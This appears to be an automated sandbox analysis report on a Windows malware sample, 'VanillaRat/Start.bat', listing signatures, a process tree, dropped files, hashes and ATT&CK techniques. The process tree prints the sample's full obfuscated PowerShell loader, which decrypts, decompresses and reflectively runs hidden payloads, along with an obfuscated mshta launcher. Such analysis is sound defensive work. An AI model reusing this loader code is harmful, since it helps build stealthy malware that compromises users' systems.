Analysis

  • max time kernel
    26s
  • max time network
    84s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-09-2023 08:28

General

  • Target

    VanillaRat/Start.bat

  • Size

    3KB

  • MD5

    78d817fe7349683c207f17c0b4774484

  • SHA1

    9dc66330a6aef8e8678b45ac3fa79091f2f50ccc

  • SHA256

    b7ddf09d72ad1671da5c5ad5bf0e5d22ac6f4fee8cedd04f188a9e109e8b86f6

  • SHA512

    77e0bdc2d0faa24d4f4ff42059f8b002b7214300fd7f44b07d76fb042b111a1ad85e2b32e1032942aaf29bed11efe17a73e623cafd777ec21e603118e70d2699

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:624
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{d201719e-65ac-4851-90d8-f94e0db48709}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:928
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Start.bat"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1872
      • C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe
        Main\\VanillaRat.exe
        2⤵
          PID:4944
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle Hidden -command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\VanillaRat\\\Handlers\\HandlerInstaller.bat' -WindowStyle Hidden -Wait}"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2212
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4500
            • C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
              "HandlerInstaller.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VROas($YFEKm){ $EnJnq=[System.Security.Cryptography.Aes]::Create(); $EnJnq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EnJnq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $EnJnq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+mgHoM3Dd8LE9FhelB1+E49NCwweh3qyJF1GxhCe+k0='); $EnJnq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wwm30jhzkHC4/5SnlEDZGA=='); $pWYkp=$EnJnq.CreateDecryptor(); $return_var=$pWYkp.TransformFinalBlock($YFEKm, 0, $YFEKm.Length); $pWYkp.Dispose(); $EnJnq.Dispose(); $return_var;}function XcsVC($YFEKm){ $zQqyq=New-Object System.IO.MemoryStream(,$YFEKm); $emglC=New-Object System.IO.MemoryStream; $RGlqr=New-Object System.IO.Compression.GZipStream($zQqyq, [IO.Compression.CompressionMode]::Decompress); $RGlqr.CopyTo($emglC); $RGlqr.Dispose(); $zQqyq.Dispose(); $emglC.Dispose(); $emglC.ToArray();}function dnTmn($YFEKm,$CaEDQ){ $NmIfY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$YFEKm); $bqkrl=$NmIfY.EntryPoint; $bqkrl.Invoke($null, $CaEDQ);}$lpRaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat').Split([Environment]::NewLine);foreach ($aneut in $lpRaC) { if ($aneut.StartsWith('SEROXEN')) { $zZPSp=$aneut.Substring(7); break; }}$jGZnr=[string[]]$zZPSp.Split('\');$yHwYZ=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[0])));$QcHAi=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[1])));dnTmn $QcHAi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dnTmn $yHwYZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
              4⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3008
              • C:\Windows\SysWOW64\dllhost.exe
                C:\Windows\SysWOW64\dllhost.exe /Processid:{fd83f171-c5b3-405f-a8eb-daf9939fb7e7}
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5080
      • C:\Windows\$sxr-mshta.exe
        C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
        1⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        PID:3896
        • C:\Windows\$sxr-cmd.exe
          "C:\Windows\$sxr-cmd.exe" /c %$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%
          2⤵
            PID:332

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Discovery

        Query Registry

        2
        T1012

        System Information Discovery

        2
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
          Filesize

          442KB

          MD5

          04029e121a0cfa5991749937dd22a1d9

          SHA1

          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

          SHA256

          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

          SHA512

          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

        • C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
          Filesize

          442KB

          MD5

          04029e121a0cfa5991749937dd22a1d9

          SHA1

          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

          SHA256

          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

          SHA512

          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ccxzug2.jnl.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Windows\$sxr-cmd.exe
          Filesize

          283KB

          MD5

          8a2122e8162dbef04694b9c3e0b6cdee

          SHA1

          f1efb0fddc156e4c61c5f78a54700e4e7984d55d

          SHA256

          b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

          SHA512

          99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

        • C:\Windows\$sxr-mshta.exe
          Filesize

          14KB

          MD5

          0b4340ed812dc82ce636c00fa5c9bef2

          SHA1

          51c97ebe601ef079b16bcd87af827b0be5283d96

          SHA256

          dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

          SHA512

          d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

        • C:\Windows\$sxr-mshta.exe
          Filesize

          14KB

          MD5

          0b4340ed812dc82ce636c00fa5c9bef2

          SHA1

          51c97ebe601ef079b16bcd87af827b0be5283d96

          SHA256

          dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

          SHA512

          d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

        • C:\Windows\$sxr-powershell.exe
          Filesize

          442KB

          MD5

          04029e121a0cfa5991749937dd22a1d9

          SHA1

          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

          SHA256

          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

          SHA512

          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

        • memory/928-62-0x0000000140000000-0x0000000140004000-memory.dmp
          Filesize

          16KB

        • memory/928-60-0x0000000140000000-0x0000000140004000-memory.dmp
          Filesize

          16KB

        • memory/2212-16-0x000001A6EC9C0000-0x000001A6EC9D0000-memory.dmp
          Filesize

          64KB

        • memory/2212-39-0x000001A6EC9C0000-0x000001A6EC9D0000-memory.dmp
          Filesize

          64KB

        • memory/2212-15-0x00007FFD20CA0000-0x00007FFD21761000-memory.dmp
          Filesize

          10.8MB

        • memory/2212-5-0x000001A6ECBB0000-0x000001A6ECBD2000-memory.dmp
          Filesize

          136KB

        • memory/2212-11-0x000001A6EC9C0000-0x000001A6EC9D0000-memory.dmp
          Filesize

          64KB

        • memory/2212-41-0x00007FFD20CA0000-0x00007FFD21761000-memory.dmp
          Filesize

          10.8MB

        • memory/2212-12-0x000001A6EC9C0000-0x000001A6EC9D0000-memory.dmp
          Filesize

          64KB

        • memory/2212-40-0x000001A6EC9C0000-0x000001A6EC9D0000-memory.dmp
          Filesize

          64KB

        • memory/3008-56-0x000002A098E90000-0x000002A098EB2000-memory.dmp
          Filesize

          136KB

        • memory/3008-38-0x000002A0EF7D0000-0x000002A0EF7E0000-memory.dmp
          Filesize

          64KB

        • memory/3008-37-0x00007FFD20CA0000-0x00007FFD21761000-memory.dmp
          Filesize

          10.8MB

        • memory/3008-53-0x000002A098D20000-0x000002A098DC4000-memory.dmp
          Filesize

          656KB

        • memory/3008-57-0x00007FFD3EED0000-0x00007FFD3F0C5000-memory.dmp
          Filesize

          2.0MB

        • memory/3008-55-0x000002A098E30000-0x000002A098E88000-memory.dmp
          Filesize

          352KB

        • memory/3008-54-0x000002A098DD0000-0x000002A098E26000-memory.dmp
          Filesize

          344KB

        • memory/3008-44-0x000002A0B0000000-0x000002A0B0024000-memory.dmp
          Filesize

          144KB

        • memory/3008-45-0x00007FFD20CA0000-0x00007FFD21761000-memory.dmp
          Filesize

          10.8MB

        • memory/3008-46-0x000002A0EF7D0000-0x000002A0EF7E0000-memory.dmp
          Filesize

          64KB

        • memory/3008-47-0x00007FFD3EED0000-0x00007FFD3F0C5000-memory.dmp
          Filesize

          2.0MB

        • memory/3008-48-0x00007FFD3ED10000-0x00007FFD3EDCE000-memory.dmp
          Filesize

          760KB

        • memory/3008-49-0x000002A0EF7D0000-0x000002A0EF7E0000-memory.dmp
          Filesize

          64KB

        • memory/3008-50-0x000002A0982C0000-0x000002A098D0E000-memory.dmp
          Filesize

          10.3MB

        • memory/3008-59-0x000002A099170000-0x000002A09917A000-memory.dmp
          Filesize

          40KB

        • memory/3008-52-0x00007FFD2D360000-0x00007FFD2D379000-memory.dmp
          Filesize

          100KB

        • memory/4944-19-0x00000000058A0000-0x00000000058AA000-memory.dmp
          Filesize

          40KB

        • memory/4944-18-0x0000000005900000-0x0000000005910000-memory.dmp
          Filesize

          64KB

        • memory/4944-42-0x0000000005900000-0x0000000005910000-memory.dmp
          Filesize

          64KB

        • memory/4944-27-0x0000000074830000-0x0000000074FE0000-memory.dmp
          Filesize

          7.7MB

        • memory/4944-22-0x0000000005900000-0x0000000005910000-memory.dmp
          Filesize

          64KB

        • memory/4944-21-0x0000000007510000-0x00000000076B6000-memory.dmp
          Filesize

          1.6MB

        • memory/4944-20-0x0000000007220000-0x0000000007300000-memory.dmp
          Filesize

          896KB

        • memory/4944-43-0x0000000005900000-0x0000000005910000-memory.dmp
          Filesize

          64KB

        • memory/4944-10-0x0000000074830000-0x0000000074FE0000-memory.dmp
          Filesize

          7.7MB

        • memory/4944-13-0x0000000000CB0000-0x0000000000E78000-memory.dmp
          Filesize

          1.8MB

        • memory/4944-17-0x0000000005910000-0x00000000059A2000-memory.dmp
          Filesize

          584KB

        • memory/4944-14-0x0000000005EC0000-0x0000000006464000-memory.dmp
          Filesize

          5.6MB

        • memory/5080-65-0x0000000000400000-0x0000000000406000-memory.dmp
          Filesize

          24KB

        • memory/5080-63-0x0000000000400000-0x0000000000406000-memory.dmp
          Filesize

          24KB